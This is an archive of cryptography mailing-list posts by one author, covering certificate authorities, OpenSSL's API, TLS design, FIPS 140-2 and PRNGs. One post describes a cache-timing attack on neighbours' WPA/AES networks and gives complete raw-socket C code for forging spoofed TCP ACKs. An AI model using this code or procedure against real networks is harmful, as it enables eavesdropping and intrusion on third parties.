   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: browser vendors and CAs agreeing on high-assurance certificates

2005-12-22 Thread Thor Lancelot Simon
On Sun, Dec 18, 2005 at 09:47:27AM -0800, James A. Donald wrote:
 
 Has anyone been attacked through a certificate that 
 would not have been issued under stricter security?  The 
 article does not mention any such attacks, nor have I
 ever heard of such an attack.

Ought we forget that two such certificates were issued to a party
(identity, AFAIK, still unknown) claiming to be Microsoft?  What,
exactly, do you think that party's plans for those certificates
were -- and why, exactly, do you think they were innocuous?

  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: AES cache timing attack

2005-06-26 Thread Thor Lancelot Simon
On Tue, Jun 21, 2005 at 10:38:42PM -0400, Perry E. Metzger wrote:
 
 Jerrold Leichter [EMAIL PROTECTED] writes:
  Usage in first of these may be subject to Bernstein's attack.  It's much 
  harder to see how one could attack a session key in a properly implemented 
  system the same way.  You would have to inject a message into the ongoing 
  session.
 
 I gave an example yesterday. Perhaps you didn't see it.
 
 The new 802.11 wireless security protocols encrypt the on-air portion
 of communications, and are typically attached to ethernet bridges.

Sorry I didn't respond to this earlier -- I was on vacation last week.

It is simple to practice this attack against an 802.11 network that is
behind a NAT or routing firewall, rather than just a simple Ethernet
bridge.  It's only moderately harder when the 802.11 network is separated
from the public Internet by a proxy firewall.

In fact, I can run it right here in my house:

From the west-facing window of my apartment building, I can see over
50 different 802.11 networks as I scan the buildings across the street
with a reasonably tight antenna.  Many of those networks are connected
to the public Internet by a cablemodem network to which I also have
access.

A small number of those networks use WPA with AES (I'm lucky I have so
many networks to choose from; this isn't common on residential networks --
yet).

So, to obtain encryption timing data, I can:

1) Do two quick tcpdumps, import them into SPSS, and look for the
   best-correlated wireless and wired activity times.  This gives me a
   good guess as to which wireless network had which public address (it
   also, presumably, gives me en/decryption timing data, for known, even
   if not chosen, plaintext; but that's just gravy).

2) Look at the tcpdump for the wired segment again (or run a new one) to
   find some open TCP connections.  These will pretty much all correspond
   to open TCP connections on the inside; routing firewalls and almost
   all NAT boxes will just pass packets sent from the outside straight
   through (a proxy firewall will require an application-layer attack)

3) Send duplicate ACKs (or wholly spurious ACKs) to the public address
   of the firewall in question and watch the wireless segment to see
   how long it takes to encrypt them.  Oh, by the way, they're chosen
   plaintext...
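
(For anyone who doubts that step 3 is easy: the spurious ACK is a few
dozen lines of raw-socket C on Linux.  The addresses, ports, and
sequence numbers below are placeholders you would take from the
tcpdump in step 2; you need root, and error checking is elided.)

#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/socket.h>

/* RFC 1071 ones-complement checksum. */
static unsigned short cksum(const void *p, int len)
{
    const unsigned short *w = p;
    unsigned long s = 0;

    while (len > 1) { s += *w++; len -= 2; }
    if (len) s += *(const unsigned char *)w;
    s = (s >> 16) + (s & 0xffff);
    s += s >> 16;
    return ~s;
}

int main(void)
{
    int fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    unsigned char pkt[sizeof(struct iphdr) + sizeof(struct tcphdr)];
    struct iphdr *ip = (struct iphdr *)pkt;
    struct tcphdr *th = (struct tcphdr *)(pkt + sizeof(*ip));
    struct { uint32_t s, d; uint8_t z, p; uint16_t l; } ph;
    unsigned char sum[sizeof(ph) + sizeof(*th)];
    struct sockaddr_in dst = { .sin_family = AF_INET };

    memset(pkt, 0, sizeof(pkt));
    ip->version = 4;  ip->ihl = 5;  ip->ttl = 64;
    ip->protocol = IPPROTO_TCP;
    ip->tot_len = htons(sizeof(pkt));
    ip->saddr = inet_addr("192.0.2.1");     /* spoofed remote peer */
    ip->daddr = inet_addr("203.0.113.5");   /* firewall's public IP */
    ip->check = cksum(ip, sizeof(*ip));

    th->source = htons(80);                 /* ports from the tcpdump */
    th->dest = htons(54321);
    th->seq = htonl(0x12345678);            /* seq/ack from the tcpdump */
    th->ack_seq = htonl(0x9abcdef0);
    th->doff = 5;  th->ack = 1;
    th->window = htons(65535);

    /* TCP checksum over the pseudo-header plus the TCP header. */
    ph.s = ip->saddr;  ph.d = ip->daddr;
    ph.z = 0;  ph.p = IPPROTO_TCP;  ph.l = htons(sizeof(*th));
    memcpy(sum, &ph, sizeof(ph));
    memcpy(sum + sizeof(ph), th, sizeof(*th));
    th->check = cksum(sum, sizeof(sum));

    dst.sin_addr.s_addr = ip->daddr;
    sendto(fd, pkt, sizeof(pkt), 0, (struct sockaddr *)&dst, sizeof(dst));
    close(fd);
    return 0;
}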

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Is finding security holes a good idea?

2004-06-16 Thread Thor Lancelot Simon
On Tue, Jun 15, 2004 at 09:37:42PM -0700, Eric Rescorla wrote:
 Arnold G. Reinhold [EMAIL PROTECTED] writes:
  My other concern with the thesis that finding security holes is a bad
  idea is that it treats the Black Hats as a monolithic group. I would
  divide them into three categories: ego hackers, petty criminals, and
  high-threat attackers (terrorists, organized criminals and evil
  governments).  The high-threat attackers are  likely accumulating
  vulnerabilities for later use. With the spread of programming
  knowledge to places where labor is cheap, one can imagine very
  dangerous systematic efforts to find security holes.  In this context
  the mere ego hackers might be thought of as beta testers for IT
  security.  We'd better keep fixing the bugs.
 
 This only follows if there's a high degree of overlap between the
 bugs that the black hats find and the bugs that white hats would
 find in their auditing efforts. That's precisely what is at
 issue.

Indeed it is -- and unless I misunderstand, you're claiming that there
is _not_ such a degree of overlap.

I think most people would tend to agree that humans working in the same
field generally work in similar ways; some, of course, are innovative
and exceptional, but in general most run-of-the-mill system programmers
have a lot of the same tools in their mental toolboxes and use them in 
much the same way; and some of the time, even the innovative and
exceptional ones work in the same way as us drudges.

This, to me, makes your claim extremely counterintuitive and questionable;
it contradicts not only my intuition but my experience.  I can't even
begin to count the number of bugs I've found by inspection of code (with
some other purpose in mind), forgotten to tell coworkers about or to fix
right away such that the fixes could be committed, and then seen others
discover when they happened to cast their eyes over the same code fragment
days, weeks, or months later.  And I have deliberately audited large
sections of code, prepared fixes, paused a couple of days or weeks to test
my results, and seen others deliberately or accidentally find and fix (or,
worse, exploit) the same bugs I'd laboriously churned up.

If you won't grant that humans experienced in a given field tend to think
in similar ways, fine.  We'll just have to agree to disagree; but I think
you'll have a hard time making your case to anyone who _does_ believe that,
which I think is most people.  If you do grant it, I think it behooves you
to explain why you don't believe that's the case as regards finding bugs;
or to withdraw your original claim, which is contingent upon it.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Is finding security holes a good idea?

2004-06-15 Thread Thor Lancelot Simon
On Mon, Jun 14, 2004 at 08:07:11AM -0700, Eric Rescorla wrote:
 in the paper. 
 
 Roughly speaking:
 If I as a White Hat find a bug and then don't tell anyone, there's no
 reason to believe it will result in any intrusions.  The bug has to

I don't believe that the premise above is valid.  To believe it, I think
I'd have to hold that there were no correlation between bugs I found and
bugs that others were likely to find; and a lot of experience tells me
very much the opposite.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Open Source Embedded SSL - Export Questions

2003-11-27 Thread Thor Lancelot Simon
On Thu, Nov 27, 2003 at 02:45:47PM +1100, Greg Rose wrote:
 At 12:27 PM 11/27/2003, Thor Lancelot Simon wrote:
 RC4 is extremely weak for some applications.  A block cipher is greatly
 preferable.
 
 I'm afraid that I can't agree with this howling logical error. RC4 is 
 showing its age, but there are other stream ciphers that are acceptable, 

Sorry if I mislead -- that was intended as two separate statements, and I
was also in a bit of a hurry.

Yes, of course there are applications for which a stream cipher is preferable
to a block cipher.  However, in my experience, programmers often choose RC4
(or another fast stream cipher) by using speed as their only criterion, and
then end up applying it in applications in which a block cipher would be a
better choice.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Open Source Embedded SSL - Export Questions

2003-11-26 Thread Thor Lancelot Simon
On Wed, Nov 26, 2003 at 02:56:40PM -0800, J Harper wrote:
 Great feedback, let me elaborate.  I realize that AES is implemented in
 hardware for many platforms as well.  I'll mention a bit more about our
 cryptography architecture below.  Do you know why AES is so popular in
 embedded?  ARC4 is faster in software and extremely small code size.  It

RC4 is extremely weak for some applications.  A block cipher is greatly
preferable.

There isn't _quite_ a speed/strength tradeoff in cryptography, but any
time you choose algorithms based purely on speed, you'd better get really,
really suspicious about the strength of what you're producing.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Thor Lancelot Simon
On Wed, Oct 22, 2003 at 05:08:32PM -0400, Tom Otvos wrote:
 
  So what purpose would client certificates address? Almost all of the use
  of SSL domain name certs is to hide a credit card number when a consumer
  is buying something. There is no requirement for the merchant to
  identify and/or authenticate the client  the payment infrastructure
  authenticates the financial transaction and the server is concerned
  primarily with getting paid (which comes from the financial institution)
  not who the client is.
 
 
 The CC number is clearly not hidden if there is a MITM.

Can you please posit an *exact* situation in which a man-in-the-middle
could steal the client's credit card number even in the presence of a
valid server certificate?  Can you please explain *exactly* how using a
client-side certificate rather than some other form of client authentication
would prevent this?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Trusting the Tools - was Re: Open Source ...

2003-10-12 Thread Thor Lancelot Simon
On Thu, Oct 09, 2003 at 07:45:01PM -0700, Bill Frantz wrote:
 At 8:18 AM -0700 10/7/03, Rich Salz wrote:
 Are you validating the toolchain?  (See Ken Thompson's
  Turing Award lecture on trusting trust).
 
 With KeyKOS, we used the argument that since the assembler we were using
 was written and distributed before we designed KeyKOS, it was not feasible
 to include code to subvert KeyKOS.  How do people feel about this form of
 argument?

Not too good.  If I knew what the target processor were, I think I could
arrange to do some damage to most general-purpose operating systems; they
all have to do some of the same fundamental things.

This is a bit more sophisticated than what Thompson's compiler did, but
it's the same basic idea.  There are some basic operations (in particular
on the MMU) that you can recognize regardless of their specific form and
subvert in a programmatic manner such that it's highly likely that you can
exploit the resulting weakness at a later date, I think.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-05 Thread Thor Lancelot Simon
On Sun, Oct 05, 2003 at 03:04:00PM +0100, Ben Laurie wrote:
 Thor Lancelot Simon wrote:
 
  On Sat, Oct 04, 2003 at 02:09:10PM +0100, Ben Laurie wrote:
  
 Thor Lancelot Simon wrote:
 
 these operations.  For example, there is no simple way to do the most
 common certificate validation operation: take a certificate and an optional
 chain, and check that the certificate is signed by an accepted root CA, or
 that each certificate in the chain has the signing property and that the
 chain reaches that CA -- which would be okay if OpenSSL did the validation
 for you automatically, but it doesn't, really.
 
 Err, yes it does, but its not very well documented.
  
  
  No.  You can't do it in one step, and you have to use functions that are
  marked in OpenSSL's header files as not being part of the official API.
  mod_ssl has a convenience function that's confusingly named just like the
  OpenSSL library functions that deals with this -- of course, it should be
  part of OpenSSL itself, but at least as of 0.9.6 it was not.
 
 Would you care to be more explicit?

I have to apologize -- I was not entirely correct in my initial statement,
but without access to the source tree I did most of my OpenSSL work in
(it belongs to a former employer) it took me a while to retrace my steps
and realize I was not quite right.

On the client side, though the documentation's poor, you're correct: there
_is_ a way to validate a certificate and chain you've received from the peer
in one step.  (I note that there is now reference in the header files to
some AUTOCHAIN stuff that I don't recall from earlier versions of OpenSSL,
but that ssl_verify_cert_chain is *still* not part of the public API; it's 
in ssl_locl.h).

On the server side (or, indeed, on the client side, if the client side 
needs to follow a chain to reach a trusted CA, and thus needs to load chain 
certificates) there's no API for loading a cert and its entire chain in one 
shot, and indeed to do so AFAICT you must use functions that are not part of 
the public API.  

See SSL_CTX_use_certificate_chain() in the mod_ssl sources (which appears 
much simpler in mod_ssl 2.8 than what I remember working with -- perhaps the 
OpenSSL API *has* improved!) and SSL_use_certificate_file, 
SSL_CTX_use_certificate_file, and SSL_CTX_use_certificate_chain_file in the 
OpenSSL sources.  And then note that *all* of the example code gets this
stuff wrong -- if it even bothers to do server certificate validation at
all.
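
For the record, the client-side one-step validation can be done against
today's public API roughly like this (the bundle file name and the
function name are mine; error handling elided):

#include <openssl/x509.h>
#include <openssl/x509_vfy.h>

/* Verify 'leaf' against the trusted roots in ca-bundle.pem, using
 * 'chain' (possibly NULL) as untrusted intermediates.  Returns 1 if
 * the chain reaches a trusted CA. */
int verify_cert(X509 *leaf, STACK_OF(X509) *chain)
{
    X509_STORE *store = X509_STORE_new();
    X509_STORE_CTX *ctx = X509_STORE_CTX_new();
    int ok;

    X509_STORE_load_locations(store, "ca-bundle.pem", NULL);
    X509_STORE_CTX_init(ctx, store, leaf, chain);
    ok = X509_verify_cert(ctx);

    X509_STORE_CTX_free(ctx);
    X509_STORE_free(store);
    return ok == 1;
}

That it takes this much machinery -- and that the corresponding
server-side "load my cert plus its chain" operation still isn't
public -- is rather the point.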

I can't lose my impression that some of the chain-handling functions moved
from ssl_locl.h to ssl.h between 0.9.6 and 0.9.7 but I don't have a 0.9.6
tree handy nor the time to sift through it.  Sigh.  I wish I had some of
my code from the last time I tackled this issue with OpenSSL at hand, but
unfortunately I don't own it, so I do not.

The complexity and instability of the API for this stuff, and the fact that
we're both rooting around *in the OpenSSL source code* to figure out which
bits of it are public and which are internal, and in which version of
OpenSSL, when the operations at hand (loading and validating chains of
certificates, from the cert for the peer's identity up to the cert from
which trust derives) is a pretty good example, itself, of why I don't care
for OpenSSL.  I spent a long time working on the X.509 support in Pluto,
too, and though I don't really care for it either it does have the decided
advantage that it appears to be designed in the right direction: from what
are the end-user's needs? instead of what is the structure of the
underlying protocol or software abstraction?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-04 Thread Thor Lancelot Simon
On Sat, Oct 04, 2003 at 02:09:10PM +0100, Ben Laurie wrote:
 Thor Lancelot Simon wrote:
  As far as what OpenSSL does, if you simply abandon outright any hope of
  acting as a certificate authority, etc. you can punt a huge amount of
  complexity; if you punt SSL, you'll lose quite a bit more.  As far as the
  programming interface goes, I'd read Eric's book and then think hard about
  what people actually use SSL/TLS for in the real world.  It's horrifying
  to note that OpenSSL doesn't even have a published interface for a some of
  these operations.  For example, there is no simple way to do the most
  common certificate validation operation: take a certificate and an optional
  chain, and check that the certificate is signed by an accepted root CA, or
  that each certificate in the chain has the signing property and that the
  chain reaches that CA -- which would be okay if OpenSSL did the validation
  for you automatically, but it doesn't, really.
 
 Err, yes it does, but its not very well documented.

No.  You can't do it in one step, and you have to use functions that are
marked in OpenSSL's header files as not being part of the official API.
mod_ssl has a convenience function that's confusingly named just like the
OpenSSL library functions that deals with this -- of course, it should be
part of OpenSSL itself, but at least as of 0.9.6 it was not.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Choosing an implementation language

2003-10-03 Thread Thor Lancelot Simon
On Fri, Oct 03, 2003 at 04:31:26PM -0400, Tyler Close wrote:
 On Thursday 02 October 2003 09:21, Jill Ramonsky wrote:
   I was thinking of doing a C++ implementation with classes and
  templates and stuff.  (By contrast OpenSSL is a C
  implementation). Anyone got any thoughts on that?
 
 Given the nature of recent, and past, bugs discovered in the
 OpenSSL implementation, it makes more sense to implement in a
 memory-safe language, such as python, java or squeak. Using a VM

I strongly disagree.  While an implementation in a typesafe language
would be nice, such implementations are already available -- one's
packaged with Java, for instance.

From my point of view, the starting point of this discussion could be
restated as: "The world needs a simple, portable SSL/TLS implementation
that's not OpenSSL, because the size and complexity of OpenSSL has been
responsible for slowing the pace of SSL/TLS deployment and for a large
number of security holes."

For practical purposes, if such an implementation is to be useful to
the majority of the people who would use it to build products in the
real world, it needs to be in C or _possibly_ C++; those are the only
languages for which compilers *and* runtime environments exist
essentially everywhere.  Coming from a background building routers and
things like routers, I can also tell you that if you're going to
require carrying a C++ runtime around, a lot of people building embedded
devices will simply not give you the time of day.

An implementation in a safe language would be _nice_, but religion
aside (please!) it's a cold hard fact that very few products that
people actually use are written in such languages -- if you leave Java
(which already has an SSL implementation) out, "very few" becomes
essentially zero.  And if we're interested in improving the security
of not only our pet projects, but of the interconnected world in
general, it seems to me that producing a good, simple, comprehensible,
small implementation *and getting it into as many products as possible*
would be one of the better possible goals to work towards.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-02 Thread Thor Lancelot Simon
On Thu, Oct 02, 2003 at 02:21:29PM +0100, Jill Ramonsky wrote:
 
 Thanks everyone for the SSL encouragement. I'm going to have a quick 
 re-read of Eric's book over the weekend and then start thinking about 
 what sort of easy to use implementation I could do. I was thinking of 
  doing a C++ implementation with classes and templates and stuff. (By 
 contrast OpenSSL is a C implementation). Anyone got any thoughts on 

A C++ implementation will be much less useful to many potential users;
perhaps the most underserved set of potential SSL/TLS users is in the
embedded space, and they often can't afford to, or won't, carry a C++
runtime around with them.  We learned this lesson with FreSSH and
threads.

I would strongly recommend a C implementation with an optional C++
interface, if C++ is the way you want to go.

Also, I'd consider, for simplicity's sake, at least at first, implementing
*only* TLS, and *only* the required ciphers/MACs (actually, using others'
implementations of the ciphers/MACs, even the OpenSSL or cryptlib ones,
is probably not just acceptable but actually a _really good idea_.)  The
major problems with OpenSSL are, from my point of view, caused by severe
overengineering in the areas of:

1) Configuration
2) ASN.1/X.509 handling
3) Tightly-coupled support for the many diverse variants of SSL/TLS.

As far as what OpenSSL does, if you simply abandon outright any hope of
acting as a certificate authority, etc. you can punt a huge amount of
complexity; if you punt SSL, you'll lose quite a bit more.  As far as the
programming interface goes, I'd read Eric's book and then think hard about
what people actually use SSL/TLS for in the real world.  It's horrifying
to note that OpenSSL doesn't even have a published interface for a some of
these operations.  For example, there is no simple way to do the most
common certificate validation operation: take a certificate and an optional
chain, and check that the certificate is signed by an accepted root CA, or
that each certificate in the chain has the signing property and that the
chain reaches that CA -- which would be okay if OpenSSL did the validation
for you automatically, but it doesn't, really.

From my point of view, a _very_ simple interface that:

1) Creates a socket-like connection object

2) Allows configuration of the expected identity of the party at the other
   end, and, optionally, parameters like acceptable cipher suite

3) Connects, returning error if the identity doesn't match.  It's
   probably a good idea to require the application to explicitly
   do another function call validating the connection if it decides to
   continue despite an identity mismatch; this will avoid a common,
   and dangerous, programmer error.

4) Provides select/read operations thereafter.

Would serve the purposes of 90+% of client applications.  On the server
side, you want a bit more, and you may want a slightly finer-grained
extended interface for the client, but still, you can catch a _huge_
fraction of what people do now with only the interface listed above.
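
In header form, the sort of thing I mean looks roughly like this (every
name here is hypothetical -- a shape, not an existing library):

/* tlsconn.h -- a deliberately tiny TLS client interface (sketch). */

typedef struct tls_conn tls_conn;

/* 1) create a socket-like connection object */
tls_conn *tls_new(void);

/* 2) expected peer identity, and optional policy */
int  tls_expect_identity(tls_conn *, const char *dnsname);
int  tls_set_ciphersuites(tls_conn *, const char *list);  /* optional */

/* 3) connect; fails unless the peer proves the expected identity */
int  tls_connect(tls_conn *, const char *host, int port);
int  tls_accept_identity_mismatch(tls_conn *);  /* explicit override */

/* 4) thereafter, socket-like I/O */
int  tls_fd(const tls_conn *);  /* for select() */
int  tls_read(tls_conn *, void *buf, int len);
int  tls_write(tls_conn *, const void *buf, int len);

void tls_close(tls_conn *);

Note the explicit override call in step 3: the default, unadorned path
fails closed.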

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Monoculture

2003-10-01 Thread Thor Lancelot Simon
On Wed, Oct 01, 2003 at 10:20:53PM +0200, Guus Sliepen wrote:
 
 You clearly formulated what we are doing! We want to keep our crypto as
 simple and to the point as necessary for tinc. We also want to
 understand it ourselves. Implementing our own authentication protocol
 helps us do all that.
 
 Uhm, before getting flamed again: by our own, I don't mean we think we
 necessarily have to implement something different from all the existing
 protocols. We just want to understand it so well and want to be so
 comfortable with it that we can implement it ourselves.

In that case, I don't see why you don't bend your efforts towards
producing an open-source implementation of TLS that doesn't suck.
If you insist on not using ESP to encapsulate the packets -- which in
my opinion is a silly restriction to put on yourself; the ESP encapsulation
is extremely simple, to the point that one of my former employers has a
fully functional implementation that works well at moderate data rates
on an 8088 running MS-DOS! -- TLS is probably exactly what you're looking
for.

Note that it's *entirely* possible to use ESP without using IKE for the
user/host authentication and key exchange.  Nothing is preventing you
from using TLS or its moral equivalent to exchange keys -- and looking
at some of the open-source IKE implementations, it's easy to see how
this would be a tempting choice.  Indeed, there's no reason your ESP
implementation would need to live in the kernel; I already know of more
than one that simply grabs packets using the kernel's tunnel driver, for
portability reasons.
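
To give a sense of just how little there is to the encapsulation: the
entire ESP header is two 32-bit words (RFC 2406), followed by the
ciphertext, padding, and authentication data:

#include <stdint.h>

/* ESP (RFC 2406): this header, then the encrypted payload and
 * padding, then the pad-length and next-header bytes, then the
 * optional authentication data. */
struct esp_hdr {
    uint32_t spi;   /* identifies the SA, i.e. which keys to use */
    uint32_t seq;   /* anti-replay sequence number */
};

All the hard parts -- agreeing on the SPI, the keys, and the
algorithms -- live in whatever key exchange you choose, which is
exactly why TLS can fill that role.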

However, if for what seem to me to be very arbitrary reasons you insist on
using an encapsulation that's not ESP, I urge you to use TLS for the whole
thing.  As I and others have pointed out here, if you're willing to *pay* 
for it, you can have your choice of TLS implementations that are simple, 
secure, and well under 100K.  Compare and contrast with the behemoth that 
is OpenSSL and it's easy to see why you wouldn't want to use the 
open-source implementation that is available to you now, but there is no 
reason you could not produce one yourself that was much less awful.

You say that you object to existing protocols because you want simplicity
and performance.  I say that it's not reasonable of you to blame the
failures of the existing *open-source implementations* of those protocols
on the protocols themselves.  I think that both the multiple good, small,
simple commercial SSL/TLS implementations and the two MS-DOS IPsec
implementations are good examples that demonstrate that what you should
object to, more properly, is lousy software design and implementation on
the part of many open-source protocol implementors, not lousy protocol design
in cases where the protocol design is actually quite good.  So if you're
going to set out to fix something, I think if you're trying to fix the
protocols, you're wasting your effort -- there are existing, widely
peer-reviewed and accepted protocols that are *already* about as simple
as they can get and still be secure the way users actually use them in the
real world.  I think that it would make a lot more sense to fix the lousy 
implementation quality instead; that way you seem much more likely to 
achieve your security, performance, and simplicity goals.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-15 Thread Thor Lancelot Simon
On Mon, Sep 15, 2003 at 12:57:55PM -0400, Wei Dai wrote:
 
 I think I may have found such a written guidance myself. It's guidance 
 G.5, dated 8/6/2003, in the latest Implementation Guidance for FIPS 
 140-2 on NIST's web site: 
 http://csrc.nist.gov/cryptval/140-1/FIPS1402IG.pdf. This section seems 
 especially relevant:
 
 For level 1 Operational Environment, the software cryptographic module 
 will remain compliant with the FIPS 140-2 validation when operating on 
 any general purpose computer (GPC) provided that: 
 
 a. the GPC uses the specified single user operating system/mode 
 specified on the validation certificate, or another compatible single 
 user operating system, and 
 
 b. the source code of the software cryptographic module does not 
 require modification prior to recompilation to allow porting to another 
 compatible single user operating system.
 (end quote)
 
 The key word here must be recompilation. The language in an earlier 

Unfortunately, another key set of words is "single user".  This would seem
to significantly limit the value of a software-only certification...


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-08 Thread Thor Lancelot Simon
On Mon, Sep 08, 2003 at 10:49:02AM -0600, Tolga Acar wrote:
 On a second thought, that there is no key management algorithm 
 certified, how would one set up a SSL connection in FIPS mode?
 
 It seems to me that, it is not possible to have a FIPS 140 certified 
 SSL/TLS session using the OpenSSL's certification.

SSL's not certifiable, period.

TLS has been held to be certifiable, and products using TLS have been
certified.  However, it's necessary to disable any use of MD5 in the
certificate validation path.  When I had a version of OpenSSL certified
for use in a product at my former employer, I had to whack the OpenSSL
source to throw an error if in FIPS mode and any part of the certificate
validation path called the MD5 functions.  Perhaps this has been done
in the version currently undergoing certification.  You'll also need
certificates that use SHA1 as the signing algorithm, which some public
CAs cannot provide (though most can, and will if the certificate request
itself uses SHA1 as the signing algorithm).

The use of MD5 in the TLS protocol itself is okay, because it is always
used in combination with SHA1 in the PRF.  We got explicit guidance from
NIST on this issue.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: PRNG design document?

2003-08-29 Thread Thor Lancelot Simon
On Fri, Aug 29, 2003 at 11:27:41AM +0100, Ben Laurie wrote:
  
  As you mentioned, the FIPS-140-2 approved PRNG 
  are deterministic, they take a random seed and extend it
  to more random bytes.  But FIPS-140-2 has no 
  provision for generating the seed in the first place, 
  this is where something like Yarrow or the cryptlib
  RNG come in handy.
 
 Actually, FIPS-140 _does_ have provision for seeding, at least for X9.17
 (you use the time :-), but not for keying.

I think there's some confusion of terminology here.  A time, Ti, for each
iteration of the algorithm, is one of the inputs to the X9.17 generator
(otherwise, you might as well just use DES/3DES in any chaining or feedback
mode, for all practical purposes).  However, it has always been permitted
to use a free-running counter instead of the time, and indeed the current 
interpretation by NIST *requires* that a counter, not the time, be used.

As for keying, you're allowed to key with whatever you want, whenever you
want, but at least from my conversations with a number of people during a
recent certification, you'd better be prepared to explain why your source
of key material is strong.

One implementation with which I was involved essentially rekeyed the
generator as soon as enough entropy had accumulated from a hardware
source; another rekeyed it depending on the number of output blocks.
Both approaches are permissible.

I do have some more thoughts on the quality of the various generators
the standard allows but I haven't had time to get them down in writing;
I'll try to do so before this thread is totally stale...

-- 
 Thor Lancelot Simon  [EMAIL PROTECTED]
   But as he knew no bad language, he had called him all the names of common
 objects that he could think of, and had screamed: "You lamp!  You towel!  You
 plate!" and so on.  --Sigmund Freud

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: PRNG design document?

2003-08-26 Thread Thor Lancelot Simon
On Fri, Aug 22, 2003 at 10:00:14AM -0700, Bob Baldwin PlusFive wrote:
 Tim,
  One issue to consider is whether the system
 that includes the PRNG will ever need a FIPS-140-2
 rating.  For example, people are now working on
 a FIPS-140 validation for OpenSSL.  If so, then
 the generator for keys and IVs MUST be a FIPS
 approved algorithm, whether or not there are

That's not quite right.

1) Various entities have already had various versions of 
   OpenSSL FIPS-140-2 certified.

2) It is permissible to use a non-Approved deterministic
   RNG for IV generation, though not for keying.

Since it's permissible to rekey the Approved PRNG, and there is no
requirement for _how_ it is rekeyed save that the input must not have
demonstrably less entropy than the output, it is possible to use, if
not Yarrow, a _very_ similar design by using an entropy pool collecting
input from one or more hardware sources to periodically rekey the
Approved X9.17 generator.

I am informed that in the past, implementations using Yarrow have, in
fact, been certified, passing the code examination in the lab by
documenting that Yarrow's output stage is, in fact, algorithmically
equivalent to the X9.17 generator.  Unfortunately, since those products
were certified, there have been some particularly ill-considered
interpretations of the X9.17 RNG specification by NIST which I believe
would now make it impossible to have a Yarrow implementation certified;
but you can get very close.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: LibTomNet [v0.01]

2003-07-08 Thread Thor Lancelot Simon
On Tue, Jul 08, 2003 at 02:20:46PM -0700, Eric Murray wrote:
 
 For comparison purposes, I have a copy of an SSLv3/TLS client library
 I wrote in 1997.   It's 56k of (Intel Linux) code for everything
 except RSA.   That includes the ASN.1 and X.509 parser.
 Implementing the server-specific parts would add only another
 couple k.  This was done for a handheld computer but runs on
 unix as well.

I believe the Certicom library is somewhere around there in size, and
it is a pretty extensive implementation.  Costs money though. ;-)

 OpenSSL is huge because it's also a general purpose crypto lib, supports
 a bunch of hardware and a bunch of algorithms, SSLv2 (ew), old apis, 
 non-blocking, etc etc.

It's also hideously overabstracted.  That, to my mind, is why it's both
hard to use and hard to maintain.  Unfortunately, its API is the only
one that is in wide use on Unix systems, which means that any alternative
would probably be forced to duplicate a frightening amount of OpenSSL's
internal complexity in order to present its _external_ complexity.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Attacking networks using DHCP, DNS - probably kills DNSSEC

2003-06-28 Thread Thor Lancelot Simon
On Sat, Jun 28, 2003 at 01:06:03PM -0700, Bill Stewart wrote:
 Somebody did an interesting attack on a cable network's customers.
 They cracked the cable company's DHCP server, got it to provide a
  Connection-specific DNS suffix pointing to a machine they owned,
 and also told it to use their DNS server.
 This meant that when your machine wanted to look up yahoo.com,
 it would look up yahoo.com.attackersdomain.com instead.

This problem is old and well-understood.  It is why there is work
in the IETF to combine the acquisition of a DHCP lease with the
acquisition of an initial IPsec SA to integrity-protect that
lease.

It's not easy for me to see why anyone would expect anything *but*
that MITM attacks against client systems that are entirely
configured by DHCP would be practical.  If the DHCP client and
server share no cryptographic guarantee of trust...

..oh, I'm sorry, I forgot that the anencephalic have fallen for
"you can magic up trust out of nowhere" about ten times in
succession in my immediately previous area of work, 802.11. :-)

Where I used to work, at ReefEdge, we disposed of the 802.11
security garbage and used a TLS-based solution that was not
entirely unlike PIC, dispensing temporary credentials for use
with IKE to users based on their legacy authentication.  As the
designer and maintainer of this system, I became *very* cognizant
of DHCP-based and DNS-based attacks, and very skeptical of the
sort of proposal someone brought me every few days suggesting
that some later establishment of a trust relationship could
overcome a successful MITM attack on one of the early stages of
the client's boot-up and SA negotiation.

